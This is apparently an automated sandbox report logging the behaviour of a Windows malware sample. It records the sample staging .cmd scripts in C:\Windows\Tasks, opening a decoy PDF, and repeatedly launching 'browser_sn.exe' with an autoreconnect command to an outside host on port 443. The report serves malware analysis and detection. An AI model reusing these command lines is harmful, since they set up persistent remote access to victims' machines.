Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C54D7E | 28_2_00007FF790C54D7E |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4AD30 | 28_2_00007FF790C4AD30 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C536D0 | 28_2_00007FF790C536D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5AE70 | 28_2_00007FF790C5AE70 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C61660 | 28_2_00007FF790C61660 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CF068C | 28_2_00007FF790CF068C |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C34E80 | 28_2_00007FF790C34E80 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C63E20 | 28_2_00007FF790C63E20 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C51620 | 28_2_00007FF790C51620 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C52650 | 28_2_00007FF790C52650 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C80650 | 28_2_00007FF790C80650 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C3C810 | 28_2_00007FF790C3C810 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C33770 | 28_2_00007FF790C33770 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4AF60 | 28_2_00007FF790C4AF60 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790CEDF80 | 28_2_00007FF790CEDF80 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5E780 | 28_2_00007FF790C5E780 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C49740 | 28_2_00007FF790C49740 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C420E0 | 28_2_00007FF790C420E0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C3A910 | 28_2_00007FF790C3A910 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C41100 | 28_2_00007FF790C41100 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C470B0 | 28_2_00007FF790C470B0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4C8D0 | 28_2_00007FF790C4C8D0 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C5A870 | 28_2_00007FF790C5A870 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4A890 | 28_2_00007FF790C4A890 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C4C090 | 28_2_00007FF790C4C090 |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 28_2_00007FF790C31880 | 28_2_00007FF790C31880 |
Source: unknown | Process created: C:\Users\user\Desktop\T8xrZb7nBL.exe "C:\Users\user\Desktop\T8xrZb7nBL.exe" | |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe | |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600 | |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600 | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4 | |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: apphelp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winsta.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wldp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winsta.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wldp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
